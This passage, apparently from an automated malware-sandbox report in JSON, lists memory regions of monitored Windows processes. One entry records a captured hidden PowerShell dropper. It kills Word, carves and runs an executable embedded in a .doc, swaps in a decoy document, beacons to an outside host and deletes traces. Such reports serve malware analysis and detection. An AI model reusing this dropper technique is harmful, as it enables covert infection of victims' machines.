"filename": null, "id": "region_1782", "name": "private_0x000007fffffa6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092653568, "timestamp": "00:01:15.226", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe\" -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", "filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_8", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 8, "origin_monitor_id": 5, "ref_parent_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": 
"process_00000008-region_00001303-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_195", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1303", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:07.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1304", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:07.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1305", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:07.629", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001306-addr_0x0000000000090000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": 
"proc_dump_196", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_1306", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:07.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1307", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:07.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1308", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:07.631", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001309-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_197", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 
2147418111, "entry_point": 0, "filename": null, "id": "region_1309", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:07.631", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 487424, "start_va": 5358419968, "type": "region", "version": 1 }, "end_va": 5358907391, "entry_point": 5358419968, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_1310", "name": "powershell.exe", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 5358419968, "timestamp": "00:01:07.631", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1311", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:07.648", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_1312", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": 
"pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:07.650", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001313-addr_0x000007fffffdd000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_198", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092878848, "type": "region", "version": 1 }, "end_va": 8796092887039, "entry_point": 0, "filename": null, "id": "region_1313", "name": "private_0x000007fffffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092878848, "timestamp": "00:01:07.650", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001314-addr_0x000007fffffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_199", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092887040, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, "id": "region_1314", "name": "private_0x000007fffffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092887040, "timestamp": "00:01:07.650", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1405", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 
65536, "timestamp": "00:01:08.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1406", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:08.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 356351, "entry_point": 0, "filename": null, "id": "region_1407", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:08.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 401407, "entry_point": 0, "filename": null, "id": "region_1408", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:01:08.008", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 458752, "type": 
"region", "version": 1 }, "end_va": 471039, "entry_point": 458752, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui", "id": "region_1409", "name": "powershell.exe.mui", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:01:08.008", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001410-addr_0x0000000000080000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_226", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 528383, "entry_point": 0, "filename": null, "id": "region_1410", "name": "private_0x0000000000080000", "norm_filename": null, "region_type": "private_memory", "start_va": 524288, "timestamp": "00:01:08.009", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001411-addr_0x0000000000110000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_227", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 1114112, "type": "region", "version": 1 }, "end_va": 1118207, "entry_point": 0, "filename": null, "id": "region_1411", "name": "private_0x0000000000110000", "norm_filename": null, "region_type": "private_memory", "start_va": 1114112, "timestamp": "00:01:08.010", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001412-addr_0x0000000000150000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { 
"ref_id": "proc_dump_228", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_1412", "name": "private_0x0000000000150000", "norm_filename": null, "region_type": "private_memory", "start_va": 1376256, "timestamp": "00:01:08.010", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2846719, "entry_point": 2424832, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1413", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2424832, "timestamp": "00:01:08.010", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001414-addr_0x00000000002c0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_229", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_1414", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:01:08.010", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001415-addr_0x0000000000490000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_230", "ref_source": "summary", "ref_type": "process_dump", "type": 
"reference", "version": 1 }, "size": 65536, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 4849663, "entry_point": 0, "filename": null, "id": "region_1415", "name": "private_0x0000000000490000", "norm_filename": null, "region_type": "private_memory", "start_va": 4784128, "timestamp": "00:01:08.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4849664, "type": "region", "version": 1 }, "end_va": 6455295, "entry_point": 0, "filename": null, "id": "region_1416", "name": "pagefile_0x00000000004a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4849664, "timestamp": "00:01:08.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6488064, "type": "region", "version": 1 }, "end_va": 8065023, "entry_point": 0, "filename": null, "id": "region_1417", "name": "pagefile_0x0000000000630000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6488064, "timestamp": "00:01:08.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8126464, "type": "region", "version": 1 }, "end_va": 29097983, "entry_point": 0, "filename": null, "id": "region_1418", "name": "pagefile_0x00000000007c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8126464, "timestamp": 
"00:01:08.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002756296, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1419", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:01:08.011", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", "version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1420", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:08.012", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1421", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:08.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ 
"readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1422", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:08.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 454656, "start_va": 8791555899392, "type": "region", "version": 1 }, "end_va": 8791556354047, "entry_point": 8791555903796, "filename": "\\Windows\\System32\\mscoree.dll", "id": "region_1423", "name": "mscoree.dll", "norm_filename": "c:\\windows\\system32\\mscoree.dll", "region_type": "memory_mapped_file", "start_va": 8791555899392, "timestamp": "00:01:08.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 8791729963008, "type": "region", "version": 1 }, "end_va": 8791730065407, "entry_point": 8791729967528, "filename": "\\Windows\\System32\\atl.dll", "id": "region_1424", "name": "atl.dll", "norm_filename": "c:\\windows\\system32\\atl.dll", "region_type": "memory_mapped_file", "start_va": 8791729963008, "timestamp": "00:01:08.013", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1425", 
"name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:08.014", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791759519744, "type": "region", "version": 1 }, "end_va": 8791759708159, "entry_point": 8791759523856, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1426", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791759519744, "timestamp": "00:01:08.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1427", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:08.015", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791762862080, "type": "region", "version": 1 }, "end_va": 8791763742719, "entry_point": 8791762874996, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_1428", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791762862080, "timestamp": "00:01:08.016", 
"type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791763779584, "type": "region", "version": 1 }, "end_va": 8791763836927, "entry_point": 8791763783808, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1429", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791763779584, "timestamp": "00:01:08.016", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791766335488, "type": "region", "version": 1 }, "end_va": 8791768444927, "entry_point": 8791766479664, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_1430", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791766335488, "timestamp": "00:01:08.017", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1431", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:08.017", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", 
"executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791772299264, "type": "region", "version": 1 }, "end_va": 8791772762111, "entry_point": 8791772372512, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_1432", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791772299264, "timestamp": "00:01:08.018", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791788683264, "type": "region", "version": 1 }, "end_va": 8791789768703, "entry_point": 8791788687460, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1433", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791788683264, "timestamp": "00:01:08.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1434", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:08.019", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791790583808, "type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, 
"filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1435", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:08.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791791566848, "type": "region", "version": 1 }, "end_va": 8791791988735, "entry_point": 8791791611964, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1436", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791791566848, "timestamp": "00:01:08.020", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791792025600, "type": "region", "version": 1 }, "end_va": 8791792848895, "entry_point": 8791792527476, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1437", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791792025600, "timestamp": "00:01:08.021", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001453-addr_0x00000000003f0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_234", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_1453", "name": 
"private_0x00000000003f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4128768, "timestamp": "00:01:08.126", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001454-addr_0x0000000001bc0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_235", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 29097984, "type": "region", "version": 1 }, "end_va": 30146559, "entry_point": 0, "filename": null, "id": "region_1454", "name": "private_0x0000000001bc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 29097984, "timestamp": "00:01:08.126", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001455-addr_0x0000000001d00000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_236", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 30408704, "type": "region", "version": 1 }, "end_va": 30932991, "entry_point": 0, "filename": null, "id": "region_1455", "name": "private_0x0000000001d00000", "norm_filename": null, "region_type": "private_memory", "start_va": 30408704, "timestamp": "00:01:08.127", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791754276864, "type": "region", "version": 1 }, "end_va": 8791754338303, "entry_point": 8791754280976, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_1456", "name": "cryptbase.dll", "norm_filename": 
"c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 8791754276864, "timestamp": "00:01:08.127", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1179648, "type": "region", "version": 1 }, "end_va": 1183743, "entry_point": 0, "filename": null, "id": "region_1475", "name": "pagefile_0x0000000000120000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1179648, "timestamp": "00:01:08.207", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1245184, "type": "region", "version": 1 }, "end_va": 1249279, "entry_point": 0, "filename": null, "id": "region_1476", "name": "pagefile_0x0000000000130000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1245184, "timestamp": "00:01:08.207", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 30932992, "type": "region", "version": 1 }, "end_va": 31846399, "entry_point": 0, "filename": null, "id": "region_1477", "name": "pagefile_0x0000000001d80000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 30932992, "timestamp": "00:01:08.207", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001478-addr_0x0000000001ed0000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": 
